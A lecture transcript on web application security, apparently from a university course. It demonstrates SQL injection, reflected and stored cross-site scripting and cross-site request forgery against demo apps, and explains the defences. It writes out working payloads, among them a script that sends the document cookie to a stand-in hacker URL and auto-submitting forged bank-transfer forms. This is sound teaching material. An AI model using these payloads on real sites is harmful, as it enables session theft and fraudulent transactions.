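def vulnerable_login(username, password):
    # String concatenation: user input becomes part of the query's structure.
    query = ("SELECT * FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return db.execute(query).fetchone()

def safe_login(username, password):
    # Placeholders: the driver quotes the values, so input stays plain data.
    return db.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()

print(vulnerable_login("alice", "goodbye"))       # None: wrong password
print(vulnerable_login("alice", "1' OR '1'='1"))  # a row comes back anyway!
print(safe_login("alice", "1' OR '1'='1"))        # None: injection defused
print(safe_login("alice", "hello"))               # the real credentials still work
```

The injected string turns the vulnerable query into WHERE username = 'alice' AND password = '1' OR '1'='1', and since OR binds last, the condition is always true; with placeholders, the whole string 1' OR '1'='1 is just compared against the password column and fails to match.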
And SQLAlchemy, which you may have been using in Python in order to do some of this stuff, automatically takes care of doing some of that escaping for you, if you're passing in the parameters in a Python dictionary for instance, which you might have done before. And so that's certainly something you can use as well. Questions about SQL vulnerabilities? Whether it's the reasons why we might want to use hashed passwords inside of our database, or how we might accidentally leak information via that forgot-your-password page, or how we might have gone about using SQL injection to gain access to unauthorized data. OK. Next up, before we take our break, is APIs. So we were thinking about Application Programming Interfaces, the idea that people could write APIs for their web applications that let people programmatically gain access to information about whatever it is that your website is designed to do. So in the case of book reviews, maybe you had an API route that returned the reviews for a particular book. But you might imagine that other sites might give you API routes that do other things. We didn't do this for project three, but you might imagine that a restaurant that had a website might have an API route that gives you back your orders, for instance. What security considerations should go into designing APIs? Or what could potentially go wrong? Broad questions, so lots of possibilities here. AUDIENCE: You can expose stuff that shouldn't be exposed. BRIAN YU: You can expose stuff that shouldn't be exposed. So that's an interesting idea, that if I, for instance, had an API for being able to look at my Amazon orders or look at the food that I've ordered from a restaurant in particular, I would want that to somehow only be accessible to me and not accessible to someone else. 
And so how would we implement this idea that some people should be able to access certain information via the API, and other people should not be able to access that information and should only be able to access some other pieces of information? AUDIENCE: Authentication. BRIAN YU: Authentication, great. We can use what are commonly known as API keys, which are just strings of text that are associated with a particular user, effectively like a password, but for APIs. Such that in order to make an API request, you not only need to submit your request, but you also need to submit your API key. And then it's on the web application to check that key, to say, does this key have permission to look at the things that it's trying to look at? And this is the idea of route authentication, that if someone makes an API request to a particular route, you better first make sure that whoever is making that request has permission to see whatever they're asking to see before you actually show it to them. And so API keys can be used for that as well. In addition, they're often used for rate limiting, where if you're worried about someone overusing an API or abusing your server by making thousands upon thousands of requests in a short period of time, you can rate limit and say, well, I only want you to be able to make x number of requests per hour. And if you have an API key, then it's pretty easy to implement this idea of rate limiting because all you have to do is keep track inside of a table somewhere that this API key has used 28 requests in the last hour, so they're coming up against their limit. And so if they use any more, we should just stop allowing them to use the API key until it refreshes for the next hour, for instance. 
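That hour-window rate limiting idea could be sketched like this. This is a hypothetical in-memory version; a real deployment would track counts in a database or cache shared across servers, and the limit of 5 requests here is arbitrary:

```python
import time
from collections import defaultdict

WINDOW_SECONDS = 3600   # one hour
MAX_REQUESTS = 5        # illustrative per-key limit

# Maps each API key to the timestamps of its recent requests.
request_log = defaultdict(list)

def allow_request(api_key, now=None):
    # Drop timestamps that have aged out of the window, then check the count.
    now = time.time() if now is None else now
    recent = [t for t in request_log[api_key] if now - t < WINDOW_SECONDS]
    request_log[api_key] = recent
    if len(recent) >= MAX_REQUESTS:
        return False  # over the limit: refuse until the window rolls over
    request_log[api_key].append(now)
    return True

for i in range(6):
    print(allow_request("key-123", now=1000.0 + i))  # the sixth call is refused
```

Because old timestamps fall out of the window on their own, the key automatically becomes usable again an hour after its earlier requests, with no separate reset step.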
And so in your project, you might not have needed to use an API key, but anytime you want to deal with potentially authenticated data or you want to rate limit, then you'll want to think about using an API key, like you had to use with the Goodreads API, in order to take advantage of features like rate limiting or authenticating particular routes to make sure that only certain users have the ability to access them. Questions about that? All right. In that case, we'll take a short break and when we come back, we'll take a look at JavaScript and look at the many different kinds of security vulnerabilities that come about when we start introducing JavaScript and client-side code into our web applications. Welcome back. So we're at about the midway point in the course, and then we started to talk about JavaScript. And so JavaScript, if you recall, was the language that we were using in order to write code on the client side, code that was actually running inside the user's browser and not on the server where Flask or Django was running, for instance. And this leads to a whole new host of potential security vulnerabilities. So let's start to chat about these. What could go wrong? What sorts of exploits can you think of that could happen when we start to introduce JavaScript into the equation? Code that can run inside the user's browser. Yeah? AUDIENCE: When we [INAUDIBLE] information, [INAUDIBLE] even that it can change. Like someone's address [INAUDIBLE] that changing someone's address to someone else and using JavaScript [INAUDIBLE]. BRIAN YU: Great. So JavaScript has all these event handlers that we've talked about, whether on load or on click, that can do various things. And potentially, if someone clicks on something and code that does something malicious is able to run, it can make something potentially bad happen. And we'll take a look at at least one example of that definitely later on today. Other things that could potentially go wrong? 
There are a lot of potential security vulnerabilities here. So let's just toss out some ideas. What would we want to avoid happening now that we have JavaScript code that can run inside the browser? AUDIENCE: Someone might redirect from the site you're on to another site. BRIAN YU: Great. Certainly, someone might try and redirect from the site you're on to some other site. That we've looked at ways that we can use JavaScript in order to redirect someone from one place to another. And if we're not careful, that JavaScript code might be able to redirect the user to someplace that the user doesn't necessarily want to be. And so we'll definitely look at an example of that later on, too. So that's definitely one potential vulnerability. Yeah? AUDIENCE: So like with HTML and CSS, it was all static, just like what a user sees. But with JavaScript, you can actually use it to run code on someone's machine. So if you write a malicious code, you can [INAUDIBLE] someone's computer. BRIAN YU: Exactly. So with HTML and CSS, we didn't really need to have to worry about code actually running for the most part because it was just here's the way that things look. And certainly we were able to use that to try and trick users by creating a link that looked like it went to Bank of America but actually went to my version of some different site. But when it comes to JavaScript, now we really have the potential for malicious code to be running on the user's web browser. And so how does that code get to the user's web browser? How does malicious code enter into some other seemingly benign site, and why might those be potential exploits? So where we'll start is by looking at one potential JavaScript exploit, which is quite common, called cross-site scripting. 
Where the idea of cross-site scripting is that we're going to look for a vulnerability where-- in the same way that in the SQL case we were able to inject whatever SQL code we wanted into a database-- a malicious user, if they are able to send the right link to the right person and get them to click on it, is able to get some arbitrary JavaScript code to run inside of the user's web browser. And so let's take a look at a very simple Flask application. This is, in fact, the entire Flask application, the contents of application.py. And there is, in fact, a major cross-site scripting vulnerability inside this application, and see if we can tease apart where exactly that is. So at the beginning, we import Flask, and we import request, which we'll need access to later. We create a new Flask application inside the current module. Then we define a default route, just when you go to the slash route. It calls this index function that returns Hello, world. And then down here, we have app.errorhandler(404). So you may not have seen this before, but Flask has built-in error handlers, specific functions that run when specific error codes happen. So 404, you might recall, is the error code for not found, when someone goes to a page that doesn't exist on the web server. And what Flask can do for you is say, whenever a 404 error happens on the web server, go ahead and run this function, which is going to supposedly render my 404 error page. And you can do the same thing for error 500, for example, internal server errors, or 403, forbidden errors, or any other error status code you want. If you want particular code to run, a particular template to be displayed when a particular error code happens on your web application, you can use Flask's built-in error handlers to be able to handle those particular situations. 
So what we have here is a function that is supposed to handle 404 errors, that handles a page not found error. It calls this page not found function, and all the page not found function is going to do is say return not found. And then it's going to append request.path, where request.path is what the URL was that the user tried to go to that resulted in the 404 error. And so what might that mean? It means that if a user goes to /foo, for example, then what's going to happen is-- I'll go ahead and go into cross-site scripting zero and go ahead and run this web application, running that very same code. So I get hello, world when I go to the default route, don't type in anything after the URL. But if I go to /foo for example, what do I expect to see? AUDIENCE: Error not found. BRIAN YU: Great. Not Found: foo, because not found was the initial message that happens when I do a 404 error message. And then /foo is the path, the request path that I tried to request. And so this might be pretty typical. That if I go to a URL that doesn't exist, I probably expect a page like this to show up that says, sorry, this route, this path that you were trying to request, couldn't be found on the web server. So what can go wrong there? Here's the web application, where's the security vulnerability? Yeah? AUDIENCE: So someone maybe could somehow inject a script path into your request path location. BRIAN YU: Great, exactly. So the vulnerability is with this request path. That if someone is able to inject JavaScript code into this request path, now suddenly, the thing that I'm returning is not found colon, potentially some JavaScript code that is then going to be run. 
And you might imagine that if a hacker now is able to take one of these URLs and convince a user to click on a link that takes them to a URL like that, that takes them to this particular function in my Flask application, now suddenly this hacker is able to run whatever JavaScript code they want to inside of the web application. So what might that look like? Instead of just going to /foo as the route that returns a benign not found /foo on the page, what if, for instance, the user typed in this as their URL? Where after the slash, they type <script>alert('hi')</script>. Now this is going to be the request path, which means that when we return not found colon plus the path, we're going to return some page that says Not Found and then this JavaScript code, JavaScript code that says alert hi. So this is code that, if someone clicks on the link, might potentially be executed by the web browser-- an example of cross-site scripting. Someone is able to send me this link, and they're able to inject arbitrary JavaScript, whatever they want, into this particular application. So let's try it. So again, going to /foo says Not Found: foo. If I do a /bar, it says Not Found: bar. What's going to happen if I do <script>alert('hi')</script>? So here's my URL now. Rather than typing in foo or bar, I've added this JavaScript code to the URL, and I'm going to try and run that. What's going to happen? AUDIENCE: An alert. AUDIENCE: Get an alert. BRIAN YU: We'll get an alert. That's what we expect to happen, at least. In fact, Chrome is getting pretty good at this. Chrome and other web browsers have built-in security features. So Chrome actually stopped me. It gave me this page that says, this page isn't working. Chrome detected unusual code on this page and blocked it to protect your personal information, for example, passwords, phone numbers, and credit cards. 
And if we look down here, it says error, blocked by XSS-- or cross-site scripting-- auditor. So Chrome's got some built-in feature here that's checking for potential cross-site scripting, like what we just tried to do, and it's blocking me from getting access to this page. And this defends against certainly some kinds of cross-site scripting, but not all. And we'll see an example of one which bypasses Chrome in just a moment. And certainly you can't rely on all web browsers to have this cross-site scripting auditor built in, so these are definitely still things to be careful about. So what would happen if this auditor didn't exist, if it wasn't in place? We can actually find out. Chrome actually lets us: if I run Chrome from the command line as chrome --disable-xss-auditor, I can run Chrome without the cross-site scripting auditor. Just turn that auditor off. And now if I go here, /<script>alert('hi')</script>, just like I did before, and press Return, now I get the alert that says hi. I've injected JavaScript code into this page, and after I press OK, now it says Not Found: /. And of course, that seemed relatively benign. An alert certainly showed up, JavaScript code was running, but nothing was really compromised. So where might this go wrong? Where could this really become a problem? Can anyone think of why this might really start to become an issue? Injecting arbitrary JavaScript code. Yeah? AUDIENCE: An executable could be put in there. BRIAN YU: Great. Any executable thing could be put into this JavaScript code so that any code could run. And in particular, that means that anything could happen on the web browser, including potentially secure information being exposed. 
And so in the case of Flask, when we talked about logging in and logging out, we've talked about this a little bit: when someone logs into a website and the server says, OK, this user is now logged in, and then I go and click on another button, how does the server still know that I'm the one logged into the website? AUDIENCE: Session. BRIAN YU: The session, certainly. And on the client side, how does the server know that the request is coming from the same place, that it's the same user making that request? AUDIENCE: It's in a cookie. BRIAN YU: Inside of a cookie, yes. So we've got some cookie, some information, stored on our computer. That is the cookie that tells the server-- it's like a hand stamp that says, yes, this is me. Show me the same page that I was looking at before. I'm still logged in. And we talked about how, if someone were ever to get access to that cookie, then they would be able to log in as us. They could pretend to be us and therefore use our credentials, and the server wouldn't be able to tell the difference because that cookie is a valid cookie, for instance. And so let's take a look at now, if it wasn't this script that was being passed into the application, but this script. Slightly different, slightly more complicated. We've got <script>, so we're starting JavaScript. We say document.write, which is just a way of writing new information, new text, into the HTML content of the page, and we're adding an image, which seems sort of strange: an image tag whose source is hacker_url?cookie= followed by document.cookie, which represents the cookie for this particular web browser, this particular page. Then the closing angle bracket ends the tag, and </script> is the end of the JavaScript. 
We effectively just added an image tag into the page where the source of that image is supposedly hacker_url?cookie=document.cookie. Why is that a problem? What's just happened here? Yeah? AUDIENCE: You're going to hit the hacker's website and pass your cookie as a [INAUDIBLE]. BRIAN YU: Exactly. We're going to hit the hacker's website, and any time we're making a request to that server, that server is potentially logging exactly what URL was requested. In fact, if you've been using Flask or Django all this time and you've looked at the terminal window, you've probably noticed over here that you've been able to see every single request that's been made. Here was a GET request to the URL slash, here's a GET request to the URL /foo, here's a GET request to the URL /bar. And so if our hacker is carefully monitoring all of the requests to the server over here at hacker URL, they're going to notice something like someone made a request to hacker_url?cookie= and then some cookie, right? So by injecting this JavaScript code into the user's web browser and having this run, they've added this image tag that's going to make a request to hacker_url and is going to pass this information, that cookie-- so now the cookie that was originally on your computer, someone else now has access to because you've now just put it inside of some request that's going elsewhere. And that's why Chrome was giving us that error, that warning message about, well, be careful. We tried to block you from being able to see this page because it looks like someone might be able to inject JavaScript code that might be able to steal your passwords or other information. Because any information, we can just send in a request to some other URL, in this case. And so this is really the danger of cross-site scripting, this ability to inject JavaScript into any arbitrary page. Questions about any of that? AUDIENCE: Question. BRIAN YU: Great. Yeah? AUDIENCE: What did they do with cookie? 
I mean-- BRIAN YU: Good question. What can we do with the cookie? So once you have the cookie, you could potentially use that to login as someone else, for instance. Or any secure information that's stored in that cookie, you'd have access to. So if there are secure pieces of data stored in the cookie, then that's potentially a vulnerability. And we talked about in last lecture, I believe, how Flask gives you the option of, if you want to, storing all of your session information inside of a cookie. Which means secure information about the contents of your shopping cart or how much money you have in your account might be stored inside of that cookie, which could potentially be a vulnerability. But even if that's not there, at minimum, that cookie is a way of convincing the server that someone else is who you are. If they steal your cookie, they can convince the server that they are you. And then they can have access to your account on whatever web application this is and potentially do whatever they want with that information. AUDIENCE: Would that be time bound with the-- like with that session, that you'd have to use it for the next session? BRIAN YU: Good question. Would it be time bounded? It quite possibly could be. That if I were to log out for instance and now the server forgets about that cookie, now suddenly we've been able to avert this scenario, or this is no longer going to be a valid way. But if they can convince me to click on the URL again the next time I log into the site, now it suddenly becomes a problem all over again. And so we'll want to think carefully about, when we're using JavaScript inside of our web applications, is there a place where we might be vulnerable. In fact, our original web application didn't even have any JavaScript in it at all. It was really just Flask and returning text. But still, a malicious hacker was able to inject JavaScript into our page just because we were including that raw JavaScript in there as well. 
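One standard defense against the reflected attack above is to escape user-supplied text before echoing it back into the page. The sketch below uses Python's standard-library html.escape; the page_not_found function here is a hypothetical stand-in for the Flask error handler, not the lecture's actual code:

```python
from html import escape

def page_not_found(request_path):
    # Escaping converts characters like < and > into HTML entities, so any
    # injected <script> tag is displayed as inert text instead of executing.
    return "Not Found: " + escape(request_path)

print(page_not_found("/foo"))
print(page_not_found("/<script>alert('hi')</script>"))
```

For an ordinary path like /foo the output is unchanged, while an injected script tag comes back as &lt;script&gt;...&lt;/script&gt;, which the browser renders as visible text rather than running as code.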
So these are certainly things to be mindful of. And both Flask and Django have ways of making sure that when you're inserting information, it's inserted in a safe way such that we escape any potential JavaScript characters to help avoid these types of situations. But these are just good things to be careful about as we go about designing these web applications. Let's go ahead and take a look at another example of cross-site scripting and how it can happen. What I will look at now is a slightly more complicated site, and this is one that Chrome is actually not going to be able to fully defend against. Cross-site scripting 1 is a web application that is going to display a message list. It's sort of a message board. We saw a brief example of something that looked very similar to this when we were first taking a look at Flask and how we're able to render templates and such. This one actually uses a database. And I'll show you what it looks like. We'll look at application.py. So I have a SQLite database that I'm going to be using that's just going to store a whole bunch of messages so that it can be on this public message board. And effectively, I have just one route, a default index route, where if I'm just viewing this page by a GET request, just asking to see the page, I skip over the POST stuff, and I just get all the messages: SELECT * FROM messages, just get all the messages in the message board. And then go ahead and render this template, index.html, passing in those messages. And then, if it's a POST request, then I'm going to get whatever the contents of the message that I'm trying to add is, whatever came in through this form, and then I'm going to insert into my messages table whatever that content is. So if I type in a new message and submit it via a POST request, it gets added to my list of growing messages.
And otherwise, if I'm just requesting the page normally, or even after something is done being inserted, I'm going to request all the messages by selecting them all from the database and then rendering them inside of index.html. So what does that look like? The result is that using just these couple of lines of code, I now have this Message List site where I can type in foo as a message and submit that. And now the message foo is there, bar goes in there, and this gets added to the public message board. And of course, if I were to close this site and open it again, or someone else were to open it on their computer, because it's all drawing from the same database, now I go back here again, and foo and bar are still there. Those messages are still there. And so where is the opportunity for cross-site scripting attacks here? AUDIENCE: You could store a script in the database. BRIAN YU: Exactly. We could store a script in the database; a script could be one of the messages. Such that that JavaScript code gets inserted into the HTML contents of this page here, and then it could potentially run. So if I were to add a message that was like <script>alert('hi')</script> and then submit that, well, what seems to happen here is that when I try and submit it, Chrome is giving me some error. It's giving me that same error as before: this page isn't working, Chrome detected unusual code. Here's that cross-site scripting auditor saying, hey, wait a minute, something's wrong. And the reason it was able to do that is because when I was submitting my request, there was some JavaScript included inside that request. So Chrome was able to detect that something might be a little fishy there, that I was submitting this JavaScript along with the request, and then it was coming back to me. So what about if I were to close the page and open it again? Now I'm just requesting the page.
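The message-board route described above can be sketched without Flask, using only Python's built-in sqlite3 module. The names follow the lecture's example; the rendering helper is a simplified stand-in for the template, which makes the stored-XSS problem visible as soon as the page is rebuilt from the database by plain string concatenation:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE messages (content TEXT)")

def post_message(content):
    # The POST branch: insert whatever the form submitted.
    db.execute("INSERT INTO messages (content) VALUES (?)", (content,))

def render_page():
    # The GET branch: SELECT * FROM messages, then build the page.
    # UNSAFE: each stored message is concatenated into the HTML as-is.
    rows = db.execute("SELECT content FROM messages").fetchall()
    return "<ul>" + "".join(f"<li>{content}</li>" for (content,) in rows) + "</ul>"

post_message("foo")
post_message("<script>alert('hi')</script>")  # stored XSS: runs for every later visitor
print(render_page())
```

Note that the attacker only submits the payload once; every subsequent visitor's ordinary GET request serves it back, which is why Chrome's auditor (which only inspects the current request) can't catch it.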
There's no JavaScript in the URL, and all that's happening is that it's extracting information from the database and displaying it onto the page. And so Chrome now has no real way of knowing that there is any potential cross-site scripting involved. So I go here, and now I get the hi alert. We were able to run arbitrary JavaScript on this page. And then I see foo and bar and then just some empty thing, because that's where the JavaScript code was before. So here's an example of us being able to add a cross-site scripting vulnerability that we were able to take advantage of, exploit, by just adding JavaScript code into here as well. And I haven't been committing these changes to the database. I haven't been saving them. So if I run this again, we'll be reset back to a clean slate. So if I go back here, I see a blank message list again. So what are some other things that I could potentially do? Well, maybe I just want to display whatever contents I want. So I'm going to add JavaScript that says <script>document.body.innerHTML = 'whatever page I want'</script>, and I submit that. Again, Chrome blocks it the first time because it detects that, with this request at least, there was something fishy going on. But when the next request comes in, when the next person comes along and they open this page, now the message list is gone. I don't see foo and bar or any of those other messages. I just see whatever the contents of the page that I wanted to show was. And that gets displayed to the user here. So that's certainly one thing they could do. Certainly stealing cookies is another thing that could happen, in the same way that we saw it in the last example. Or someone could say, you know what? Let's just take the user to an entirely different site. Let's take them to my site, where I can now try and steal information from them as well, by saying window.location equals, and I can say cs50.github.io/web.
And so now this window.location equals some URL is the JavaScript code that I'm running. I'll submit that. And when the next user comes along and they try and go to my page, now they're suddenly redirected. I've taken them somewhere else entirely. And if that other new page looks sort of similar to the old page, they might be tricked into thinking it is the same old page. And they might be interacting with it, typing in their credentials, usernames, and passwords, and now this hacker is able to gain access to that as well. And so how do we defend against these sorts of cross-site scripting vulnerabilities? Well, Flask is actually pretty good about this. By default, when you're rendering a template with render_template and you're plugging in some information, Flask will automatically escape that stuff for you. It will say, you know what? This is stuff that could potentially be JavaScript or could potentially be unsafe, so we'll go ahead and escape it and protect that information for you. Certainly not all frameworks are like that, and certainly if you're just doing string concatenation like we were in the previous example, then that's not something we can really rely on. But if we take a look at templates/index.html, in order for this to really work the way that I wanted it to, I had to add this | safe filter in here, where this is my way of telling Jinja2, the template rendering engine, don't worry about escaping anything. Just display the contents. And so in reality, if you were to just do {{ message.content }}, Flask would be smart enough to try and defend against this for you. But it is something that you just want to be careful about: anytime you have text that you think is safe, is it really safe? Is there a potential for JavaScript code to be injected into there? And if you're generating the templates yourself by string concatenation, like we were in the previous example, is there an opportunity for cross-site scripting to appear there as well?
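The escaping that Jinja2 performs by default can be illustrated with the standard library's html.escape. This is a sketch of the mechanism, not Jinja2's actual implementation: the first line is roughly what {{ message.content }} does, and the second is what opting out with | safe reverts to:

```python
import html

message = "<script>alert('hi')</script>"

# Default autoescaping: special characters become HTML entities, so the
# browser displays the text instead of executing it.
escaped = html.escape(message)
print(escaped)  # &lt;script&gt;alert(&#x27;hi&#x27;)&lt;/script&gt;

# What | safe amounts to: the raw string is inserted verbatim, so any
# embedded <script> tag will execute in the visitor's browser.
raw = message
print(raw)
```

Escaping doesn't delete the attacker's message; it just guarantees the message is rendered as inert text rather than interpreted as markup.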
And so that's certainly one of the major vulnerabilities that can come about as we start to use JavaScript inside of our web applications. Questions about that? All right. Let's move on and take a look at the next web framework that we talked about, which in particular was Django. And so when we first took a look at Django, we looked at how we would go about doing the same things we did in Flask, about rendering templates and displaying pages and using server-side logic to handle requests. And in particular, we looked at forms. And when we did look at forms, I had to add a line to one of the forms that seemed a little bit strange. Does anyone remember what that line was? Yes? AUDIENCE: CSRF token. BRIAN YU: Yeah, we added the CSRF token line to it. And I said don't worry about that for now, we'll talk about it later. And now is the time that we're going to start talking about it. CSRF stands for Cross-Site Request Forgery. And this is yet another type of attack, where Cross-Site Request Forgery is the idea of forging a request to some other website in order to take some action on a site that the user might already be logged into. And so what might be an example of that? Let's say, for instance, that someone was logged into their bank's website. And I, on some other website, wanted to try and trick the user into transferring some money to me, for instance. How might I go about doing that? Well, you might imagine very simply that I might start by creating my own website that looks something like this. I have the body of my website, and I have an a href, a link. And this link goes to http://yourbank.com/transfer, and then some arguments, some GET parameters: to=Brian, amount=2800, for instance.
And if the bank is set up in such a way that making a GET request to /transfer, passing in as arguments who you're transferring to and what the amount is, initiates a transfer, now I've been able to create a sort of security vulnerability. If this is what's displayed on my page and I can convince someone to click here, so long as they're already logged in to yourbank.com, then clicking on that link will automatically initiate that transfer. So if yourbank.com is set up in that way, such that transferring money just happens via this GET request, then that's certainly a way that I could trick someone into transferring money to me. What are some ways to protect against that? What can yourbank.com do to make sure that we can't do something like this, such that someone else can't just add a link that says click here and automatically initiate the transfer of money? Yeah? AUDIENCE: When you're doing an operation like this, you want to send some token with it so it knows that it was you that's doing it, and you're not being played. BRIAN YU: Great, some token. And certainly, we'll see more about that when we get to some more details. But right now, this is just a link that you're clicking on. So we're just clicking on a link. What else could the bank do? But that's certainly one good answer. AUDIENCE: Not expose a service with a GET request like that. BRIAN YU: Great. Not expose a GET request like this. That could certainly be something. And in fact, this is generally good web practice: you don't want GET requests to be modifying the state of something, like modifying who has what amounts of money. Generally, all of that should happen inside of a POST request, such that it really needs to be a form submission in order for that to happen. And of course, maybe this isn't such a big deal because I'm saying, click here.
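The defense just suggested — refusing to change state on a GET — can be sketched as follows. The yourbank.com scenario, the /transfer route, and the parameter names all follow the lecture's hypothetical; this is not a real banking API, just the shape of the check:

```python
def handle_transfer(method: str, params: dict, balances: dict) -> int:
    """Sketch: only a POST may move money. A GET triggered by a link
    or an <img src="..."> tag is refused with 405 Method Not Allowed."""
    if method != "POST":
        return 405
    balances[params["to"]] = balances.get(params["to"], 0) + int(params["amount"])
    return 200

balances = {}
# The attack from the lecture: a GET to /transfer?to=Brian&amount=2800
status = handle_transfer("GET", {"to": "Brian", "amount": "2800"}, balances)
print(status, balances)   # nothing moved
status = handle_transfer("POST", {"to": "Brian", "amount": "2800"}, balances)
print(status, balances)   # transfer went through
```

As the lecture goes on to show, requiring POST alone is not sufficient, since a hidden auto-submitting form can still forge the POST; that gap is what the CSRF token closes.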
And so as long as the user is smart and as long as they're careful, and they hover over the link and see, oh, this is going to take me to yourbank.com/transfer, then I'm safe. So how might a hacker get around that, in order to make it such that the user doesn't need to click on, click here, to initiate that transfer? AUDIENCE: They don't need [INAUDIBLE] in other website. BRIAN YU: Great. So hypothetically, we could just add some JavaScript code here such that, rather than a link that someone needs to click on, we'll just add some JavaScript code that will automatically redirect the user there, for instance. And that could be something that could happen as well. But then at minimum, the user is taken to that other website, and now they can see that that transfer has happened. But there are even more subtle ways of doing this as well. A couple of slides ago, we talked about how image tags, for instance, can be used, where if you provide the link to whatever the source of the image is, that will automatically trigger a request there as well. And so you might imagine that instead of structuring my hacking page like this, I could try this as my exploit instead: just render an image where the source of that image is yourbank.com/transfer and here's what I'm transferring. Now, no need for a user to click on any link at all. As soon as they go to my page, their web browser is going to make a request to this URL, and that's going to potentially initiate a transfer. And so that's certainly a potential security vulnerability. And so someone suggested, OK, well, rather than make your bank take all of its transfers via GET requests, we might instead want to do this via a form that someone needs to submit, some POST request. It can't just be you clicking on a link or rendering some image that's going to trigger the transfer of funds. So maybe you might imagine that I could do something like this.
This might be an exploit that I can use now on my site. I create a form whose action is yourbank.com/transfer, the method is POST, and now I have these hidden inputs, input type="hidden". This is an input type that's just not going to appear to the user. The user is not going to see this at all. It's an input named to, whose value is who I want to transfer the money to. I have an input that is the amount, which is the amount of money that I want to transfer. And then I have an input of type submit, which is just going to be a button that says click here. And so all the user is going to see, if this code is rendered, is what? What does the user see? AUDIENCE: Click here. BRIAN YU: Exactly. They just see this one input field, this button that says click here, because these two input fields are hidden. And of course, click here could say anything. It could say next page, for instance. Something benign that looks like something you might reasonably just click that would take you somewhere else, when in reality, it's submitting a form that's going to transfer funds to someone, in some amount. But of course, maybe we're OK: if the user is careful and isn't going to click on a button when they don't know what that button actually does, then they're safe. So how might a hacker still get around this and still be able to get the user to submit this form, even without the user clicking on a button? Yeah? AUDIENCE: Can you do a POST request from JavaScript code? BRIAN YU: Can you do a POST request from JavaScript code? Certainly you can. We actually looked at ways we could do that before when we were talking about AJAX and making requests to a server in order to get more information from the server after we've already loaded the page. So that's certainly one option as well.
Another way we could do it is just by adding this additional line to the body: on load-- when you're done loading-- here's what the body should do. document.forms[0].submit() gets the first form in the document and submits it. Just by adding that single line of JavaScript code, now as soon as the user loads this page, this form will be submitted, and that will initiate the transfer at yourbank.com. So certainly, this isn't a good scenario we want to be in. This is CSRF, Cross-Site Request Forgery, where we are able, from some other site, to forge a request to yourbank.com and pass it off as though the user had made it themselves, in order to initiate the transfer. And so long as I know what parameters that request takes, I'm able to forge that request. And so the solution, as was pointed out, which is what Django uses and a bunch of other web frameworks use, is to add a special token, effectively a password. The idea is that you would write this inside of your Django code, and if you were to look at the HTML that gets rendered as a result, what's actually happening is that in place of the CSRF token tag, the Django web server is inserting some long string, effectively a token or a password, that is associated with this specific form. Such that when the user submits that form, the token is submitted along with it. And the server can then check: does this token match the token that I initially sent out? And if and only if they match, we're going to actually initiate the transfer. That way, no other website is able to forge a request to my bank's transfer page, because they're not going to know what the token is. It's going to be a new token every time we make a request, and that's going to allow us to avoid a situation where someone, from some other site, might be able to make a request that attacks the /transfer route in this case. So that's why Django has that CSRF token in place. It's to prevent against those kinds of attacks.
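The token mechanism just described can be sketched with the standard library. This is a simplified stand-in for what Django's {% csrf_token %} machinery does, not its actual implementation; the session here is just a dict standing in for server-side session storage:

```python
import hmac
import secrets

def issue_token(session: dict) -> str:
    """When the server renders the form, it generates a fresh random
    token and remembers it in the user's session."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token

def hidden_input(token: str) -> str:
    # The token is embedded as a hidden field alongside the real inputs.
    return f'<input type="hidden" name="csrfmiddlewaretoken" value="{token}">'

def validate_submission(session: dict, submitted: str) -> bool:
    """On POST, proceed only if the submitted token matches the one tied
    to this session. A forger on another site can't know it."""
    expected = session.pop("csrf_token", None)  # single-use: fresh token per form
    return expected is not None and hmac.compare_digest(expected, submitted or "")

session = {}
token = issue_token(session)
print(hidden_input(token))
print(validate_submission(session, token))  # genuine submission passes
```

Using hmac.compare_digest for the comparison avoids leaking information through timing, and popping the token makes replayed submissions fail.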
Flask on its own doesn't, by default, have this sort of protection built in, although there are extensions that you can add on to Flask in order to help protect against this particular type of attack as well. So these are also just good things to be aware of, potential security vulnerabilities that can exist, and things you'll want to think about as you design your application. Can just anyone initiate a transfer by submitting a POST request, or do they need some special, potentially changing token as they go about doing that? Questions about the security vulnerabilities we've talked about so far? OK. Let's go ahead and move on from Django and talk a little bit about CI/CD. And so this is relatively recent, where we were talking about how we might leverage CI tools, where we looked at Travis in particular as a tool that we can use in order to run tests and to deploy our code. And we connected Travis to GitHub, whereby Travis was able to run tests on our GitHub code inside of our repositories and then check to make sure that those tests, in fact, passed. What vulnerabilities appear there? Or what things should we be considering when we start to think about that? Yeah? AUDIENCE: You're giving Travis access to your codebase. BRIAN YU: Yeah, exactly. We're now giving Travis access to our codebase. So whereas before, our code was stored on GitHub and GitHub alone, such that, certainly, if GitHub was compromised, our code was compromised as well, now we've given Travis access to all of our private repositories on GitHub, potentially, such that now there are two points at which a breach could result in our code being compromised. If GitHub is compromised, our code is compromised. But likewise, if Travis is compromised for some security reason, then our code might also be compromised, because Travis has access to our GitHub account.
And so any time you deal with accounts that are able to grant permission to other applications or other accounts to get access to that information, that's where there's potentially room for security vulnerabilities. And so we see that with GitHub, where GitHub is allowed to authorize other applications, if you give them permission, to have access to your information as well. But you see this in other websites too. In fact, Facebook does this, and has been under controversy recently, because it can grant third-party applications the right to look at your user information. And if you grant a third-party application that right, now if any one of those is compromised, then your own user information is compromised. And so it's the same type of thing, where you want to be careful: if you're giving one website access to your user information or your code and your repositories, then what other services also have the same access to that information as well? And so if you're the one designing the services, you want to be careful about what other services you give access to. And if you're the one using GitHub or Travis, you also want to be careful about how many different third-party services have access to all of your private repositories, for example. And so as a final example, moving on to what we were talking about just last week, we talked a little bit about scalability and the idea that once we've written our application and we're ready to deploy it, we need to think about how we're going to scale this application as more and more users start using it. We talked about load balancers and having multiple, different servers. And we talked about, in particular, that any server is a finite machine that can only handle a certain number of requests in a certain amount of time. Maybe x requests per second, for instance, where x is some number.
